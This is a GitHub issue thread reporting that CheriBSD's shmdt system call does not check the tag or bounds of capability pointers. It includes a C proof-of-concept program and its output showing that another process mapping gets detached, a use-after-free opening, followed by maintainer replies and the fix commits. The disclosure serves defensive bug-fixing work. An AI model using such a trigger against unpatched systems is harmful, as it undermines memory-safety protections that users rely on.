CTSRD-CHERI/cheribsd #728: shmdt doesn't check the tag of pointers

saaramarmsft, 2020-10-14:
Follow-up on the last issue I reported in munmap #709 , I found the same issue seems to exist in shmdt. Consider the following POC:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

#define COUNT       0x10
#define SHM_SIZE    0x800

int main(void)
{
    key_t keys[COUNT];
    int shmids[COUNT];
    char *data_ptrs[COUNT];
    char *first;
    int mode;

    for (int i = 0; i < COUNT; ++i) {
        /*  create the segment: */
        if ((shmids[i] = shmget(keys[i], SHM_SIZE, 0644 | IPC_CREAT)) == -1) {
            perror("shmget");
            exit(1);
        }

        /* attach to the segment to get a pointer to it: */
        data_ptrs[i] = shmat(shmids[i], NULL, 0);
        if (data_ptrs[i] == (char *)(-1)) {
            perror("shmat");
            exit(1);
        }
        printf("shm_ptr == %p\n", data_ptrs[i]);
    }
    
    printf("trigger\n");
    first = data_ptrs[0];
    printf("first == %p --> %#p\n", first, first);
    first += 0x8000;
    printf("first == %p --> %#p\n", first, first);

    printf("calling shmdt( first )\n");
    /* detach from the segment: */
    if (shmdt(first) == -1) {
        perror("shmdt");
        exit(1);
    }

    for (int i = 0; i < COUNT; ++i) {
        int id;
        
        if ((id = shmget(keys[i], SHM_SIZE, 0644 | IPC_CREAT)) == -1) {
            perror("shmget");
            exit(1);
        }

        printf("%p\n", shmat(id, NULL, 0));
    }
    return 0;
}
```

Output:
```
root@qemu-cheri128-Testadmin:~/shm_poc # ./shm_poc
shm_ptr == 0x40000000
shm_ptr == 0x40001000
shm_ptr == 0x40002000
shm_ptr == 0x40003000
shm_ptr == 0x40004000
shm_ptr == 0x40005000
shm_ptr == 0x40006000
shm_ptr == 0x40007000
shm_ptr == 0x40008000
shm_ptr == 0x40009000
shm_ptr == 0x4000a000
shm_ptr == 0x4000b000
shm_ptr == 0x4000c000
shm_ptr == 0x4000d000
shm_ptr == 0x4000e000
shm_ptr == 0x4000f000
trigger
first == 0x40000000 --> v:1 s:0 p:0007817f b:0000000040000000 l:0000000000000800 o:0 t:-1
first == 0x40008000 --> v:0 s:0 p:0007817f b:0000000040008000 l:0000000000000800 o:0 t:-1
calling shmdt( first )
0x40008000
0x40010000
0x40011000
0x40012000
0x40013000
0x40014000
0x40015000
0x40016000
0x40017000
0x40018000
0x40019000
0x4001a000
0x4001b000
0x4001c000
0x4001d000
0x4001e000
root@qemu-cheri128-Testadmin:~/shm_poc #
```

This way, if attackers can advance pointers (again, without dereferencing them), and pass those to shmdt syscall, they can cause UAF on other still in-used mappings.

brooksdavis, 2020-10-14:
Thanks for the report. Upon review, `shmdt` has a number of issues including not checking tag and not checking the bounds of the passed capability. We'll give it a closer look.

saaramarmsft, 2020-10-15:
Agreed :) Thanks!

jrtc27, 2021-06-10:
Not sure why this wasn't closed automatically, it was fixed in https://github.com/CTSRD-CHERI/cheribsd/commit/155af67d3a50cd67733c11d8c68d833295c95391.

commit 417e45df (2020-10-16): shmdt: Rework shmaddr capability checking

Require that the capability be tagged, unsealed, bear the VMMAP
permission, and cover the mapped region.

Fixes #728
commit 155af67d (2020-11-03): shmdt: Rework shmaddr capability checking

Require that the capability be tagged, unsealed, bear the VMMAP
permission, and cover the mapped region.

Fixes #728
closed 2021-06-10 by jrtc27